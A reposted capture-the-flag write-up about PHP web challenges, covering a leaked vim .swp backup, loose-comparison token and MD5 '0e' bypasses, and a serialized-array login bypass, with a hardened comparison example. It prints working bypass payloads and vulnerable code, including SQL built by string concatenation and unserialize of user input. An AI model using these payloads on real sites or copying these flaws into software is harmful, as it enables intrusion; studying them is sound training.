Forgot Password

At first I tried all kinds of injection and none of them worked. In the page source I found the admin's address; entering it in the address bar showed nothing useful. I entered a random email and the page returned an address, ./step2.php?email=youmail@mail.com&check=???????, and still there was no injection. I was out of ideas; only after reading a more experienced player's writeup did I remember that the vim editor was the key:

A file edited with vim leaves a temporary .swp file behind. I tried step1.php and step2.php; neither had a temp file. The source also referenced a submit.php, and trying .submit.php.swp showed that it existed.
It contains this key piece of code:
```php
if(!empty($token)&&!empty($emailAddress)){
    if(strlen($token)!=10) die('fail');
    // loose comparison: a numeric string such as "0000000000" is != '0' only if its numeric value differs from 0
    if($token!='0') die('fail');
    // token and email are concatenated straight into the query (no parameter binding)
    $sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
    $r = mysql_query($sql) or die('db error');
    $r = mysql_fetch_assoc($r);
    $r = $r['num'];
    if($r>0){
        echo $flag;
    }else{
        echo "失败了啊"; // "failed"
    }
}
```

So the token must be 10 characters long and must satisfy `$token != '0'` being false, i.e. `$token == '0'` under PHP's loose comparison, and the admin's email address must also be supplied.
Construct the payload: token=0000000000&emailAddress=admin@simplexue.com
Flag obtained.
Viewing the page source reveals a hint:

```php
$test=$_GET['username'];
$test=md5($test);
if($test=='0')
```

This is obviously a PHP loose comparison: `==` compares loosely, and any string that starts with `0e` followed only by digits is treated as a numeric string equal to 0, whatever the digits are, so `== '0'` always holds.
Take any of the well-known strings whose MD5 hash begins with 0e, enter it as the username, and after submitting you get a path.
Opening the path shows the following code:

```php
$unserialize_str = $_POST['password'];
$data_unserialize = unserialize($unserialize_str);
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
{
    print_r($flag);
}
```

Seeing unserialize means deserialization: serialize() encodes variables and their values as text, and unserialize() restores the original variables.
According to the hint, the submitted password must contain a `user` key equal to some value and a `pass` key equal to some value. Since the check uses `==` rather than `===`, this is again a loose comparison.
In PHP, `true == $s` holds for any string that is not empty and not "0", so we construct an array whose `user` and `pass` values are both true; serializing it gives the password value:

```php
<?php
$str1 = "";
$str1 = array("user"=>true, "pass"=>true);
echo var_dump(serialize($str1));
?>
```

Back on the home page, enter the username and password to get the flag.
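The two loose comparisons above (the `0e` MD5 check and the `true == string` check after unserialize) side by side with their strict counterparts, as an added example that is not part of the original write-up; the digest string and the value `'secret'` standing in for `'???'` are constructed assumptions.

```php
<?php
// Constructed stand-in for an MD5 digest that starts with "0e" followed only
// by digits: PHP treats it as a numeric string (0 * 10^n), so it equals "0".
$zeroE = "0e12345678901234567890123456789012";

function loose_md5_check(string $digest): bool {
    return $digest == '0';   // numeric-string comparison: "0e..." == "0" is true
}

function strict_md5_check(string $digest): bool {
    return $digest === '0';  // type-and-value comparison, no numeric coercion
}

var_dump(loose_md5_check($zeroE));   // bool(true)  -- the bypass
var_dump(strict_md5_check($zeroE));  // bool(false)

// The serialized array from the write-up: both keys set to boolean true.
$payload = 'a:2:{s:4:"user";b:1;s:4:"pass";b:1;}';

function loose_login(string $serialized): bool {
    $d = unserialize($serialized);            // attacker controls types (and classes) here
    return $d['user'] == 'secret' && $d['pass'] == 'secret'; // true == 'secret' is true
}

function strict_login(string $input): bool {
    $d = json_decode($input, true);           // plain data format, never instantiates objects
    if (!is_array($d) || !isset($d['user'], $d['pass'])) {
        return false;
    }
    return is_string($d['user']) && $d['user'] === 'secret'
        && is_string($d['pass']) && hash_equals('secret', $d['pass']);
}

var_dump(loose_login($payload));    // bool(true)  -- the bypass
var_dump(strict_login($payload));   // bool(false): not JSON, rejected outright
var_dump(strict_login(json_encode(['user' => 'secret', 'pass' => 'secret']))); // bool(true)
```

Run it with `php example.php`; the same results hold on PHP 7 and PHP 8, since numeric-string against numeric-string comparison is still numeric in PHP 8.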
Reposted from: https://www.cnblogs.com/Ragd0ll/p/8644482.html